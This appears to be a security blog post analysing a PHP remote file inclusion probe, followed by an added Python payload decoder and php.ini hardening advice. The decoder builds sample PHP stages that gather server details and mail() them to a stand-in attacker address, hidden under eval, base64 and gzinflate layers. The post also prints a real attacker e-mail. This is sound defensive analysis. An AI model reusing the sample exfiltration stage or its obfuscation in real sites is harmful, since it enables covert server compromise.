Intruders: Website exploitation

We decided to take a look at a bunch of the different exploitation attempts that are thrown at our site every single day. Aside from the usual SQL-injection attempts, what we mostly see is a larger number of PHP remote file inclusion (RFI) attempts, so let's take a close look at one of them. We'll omit the actual URL from the blog; suffice it to say that the attacker tried to find a vulnerable PHPAdsNew installation.

So, we downloaded the URL that they tried to include:

[screenshot: RFI exploit]

It's pretty easy to spot that the file is base64 encoded: the decoded contents are passed to eval(), which then executes them as PHP. Let's take a look at the decoded exploit:

[screenshot: base64decoded]

There is still a small portion that is base64 encoded, but let's see what the other parts do. You can see the script building a few strings from data it can get out of the PHP environment, such as the hostname of the server and whether safe_mode is on. It then sends that data onwards somewhere. The recipient address is the part that is still encoded; after decoding it we can see that the recipient is:

fr33sh3ll@gmail.com

So whenever the automated scripts the attacker is using successfully exploit an RFI-vulnerable site, the attacker gets an e-mail listing the vulnerable site and URL. Later on he/she can pick a server from those e-mails and do just about anything he/she wants with it.
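As a worked example, added here and not taken from the post, the following Python script does the peeling described above: it finds base64 literals in a captured payload, decodes them layer by layer, and reports where eval(), mail(), safe_mode checks and any e-mail address turn up. The two sample payloads are constructed stand-ins for the two stages (the attacker's real file and address are not reproduced; attacker@example.com and the PHP text are assumptions). It also handles the gzinflate(base64_decode(...)) layering that later kits commonly add, which goes beyond the single base64 layer in the post's sample.

```python
"""Peel a captured PHP RFI payload: strip its base64 (and raw DEFLATE) layers,
then pull out the indicators discussed above: eval(), mail(), safe_mode checks
and the base64-hidden recipient address."""
import base64
import binascii
import re
import zlib

# ---- Constructed sample payloads: an assumption for this example, not the
# ---- real file from the post.
SAMPLE_EMAIL = "attacker@example.com"


def _raw_deflate(data: bytes) -> bytes:
    """Raw DEFLATE without a zlib header, the format PHP's gzdeflate()/gzinflate() use."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


# Inner stage: gather hostname, URL and safe_mode state, mail them to a hidden address.
INNER_PHP = (
    '<?php\n'
    '$host = $_SERVER["SERVER_NAME"];\n'
    '$url  = "http://" . $host . $_SERVER["REQUEST_URI"];\n'
    '$safe = ini_get("safe_mode") ? "on" : "off";\n'
    '$to   = base64_decode("' + base64.b64encode(SAMPLE_EMAIL.encode()).decode() + '");\n'
    '@mail($to, "rfi " . $host, $url . " safe_mode=" . $safe);\n'
    '?>'
)
# Outer stage, laid out like the file in the post: one eval(base64_decode(...)).
OUTER_PHP = ('<?php eval(base64_decode("'
             + base64.b64encode(INNER_PHP.encode()).decode() + '")); ?>')
# The same with an extra gzinflate() layer, which later kits commonly add.
OUTER_GZ_PHP = ('<?php eval(gzinflate(base64_decode("'
                + base64.b64encode(_raw_deflate(INNER_PHP.encode())).decode()
                + '"))); ?>')

B64_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')   # long runs of base64 alphabet
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')
INDICATORS = ('eval(', 'base64_decode(', 'gzinflate(', 'mail(',
              'safe_mode', '$_SERVER', 'fsockopen(', 'system(')


def _is_text(s: str) -> bool:
    return all(ch.isprintable() or ch in '\r\n\t' for ch in s)


def _inflate(raw: bytes):
    try:
        return zlib.decompress(raw, -15)   # -15: raw DEFLATE, no header
    except zlib.error:
        return None


def _try_decode(literal: str):
    """base64-decode one literal; if the bytes are not text, try raw-inflating them."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return None
    for candidate in (raw, _inflate(raw)):
        if candidate is None:
            continue
        try:
            text = candidate.decode('utf-8')
        except UnicodeDecodeError:
            continue
        if _is_text(text):
            return text
    return None


def decode_layers(payload: str, max_depth: int = 5):
    """Return (depth, plaintext) for the payload and every layer hidden under base64 in it."""
    layers = [(0, payload)]
    frontier = [payload]
    for depth in range(1, max_depth + 1):
        nxt = []
        for chunk in frontier:
            for m in B64_RE.finditer(chunk):
                text = _try_decode(m.group(0))
                if text is not None:
                    nxt.append(text)
        if not nxt:
            break
        layers.extend((depth, t) for t in nxt)
        frontier = nxt
    return layers


def analyse(payload: str, max_depth: int = 5) -> dict:
    """Summarise a payload: layer count, shallowest depth of each indicator, e-mail addresses."""
    layers = decode_layers(payload, max_depth)
    indicators = {}
    emails = set()
    for depth, text in layers:
        for token in INDICATORS:
            if token in text:
                indicators.setdefault(token, depth)
        emails.update(EMAIL_RE.findall(text))
    return {'layers': len(layers), 'indicators': indicators, 'emails': sorted(emails)}


if __name__ == '__main__':
    for name, sample in (('eval+base64', OUTER_PHP), ('eval+gzinflate+base64', OUTER_GZ_PHP)):
        report = analyse(sample)
        print(f"{name}: {report['layers']} layers, recipients {report['emails']}")
        for token, depth in sorted(report['indicators'].items(), key=lambda kv: kv[1]):
            print(f"  depth {depth}: {token}")
```

Run it on a file fetched from the URL in the include attempt (fetch it from a throwaway host, never from the web server that was probed). The recipient address is what you want to hand to the abuse contact; the indicator depths tell you how many layers of obfuscation the kit uses, which is a handy fingerprint when the same kit shows up again under a different URL.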

There are several ways to make such attacks much harder to perform, such as turning on safe_mode (on the PHP versions that still have it; it was deprecated in 5.3 and removed in 5.4) or, better, turning off allow_url_include (available since PHP 5.2) and, where nothing on the host needs it, allow_url_fopen. More good tips can be found for example on these two sites:
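As an added example, not from the post or from the PHPAdsNew project, here are the php.ini directives from the previous paragraph with the weak values beside the hardened ones. The directive names are real; the comments are ours.

```ini
; Weak: include()/require() may fetch code over the network, which is
; exactly what the PHPAdsNew RFI probe above relies on.
allow_url_fopen = On
allow_url_include = On

; Hardened (PHP 5.2.0 and later, where allow_url_include exists):
; allow_url_include=Off also blocks php://input and data: sources in include().
allow_url_include = Off
; Only switch this one off if nothing on the host needs fopen() on URLs.
allow_url_fopen = Off
```

Check the live values with `php -i | grep -i allow_url`, keeping in mind that the CLI and the web SAPI can load different ini files, so confirm the web server's values via phpinfo() as well. Note that allow_url_include=Off only stops remote sources: an include() built from user input can still read local files, so the included path should still be checked against a whitelist of allowed names.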

http://www.madirish.net/?article=229

http://www.hardened-php.net/
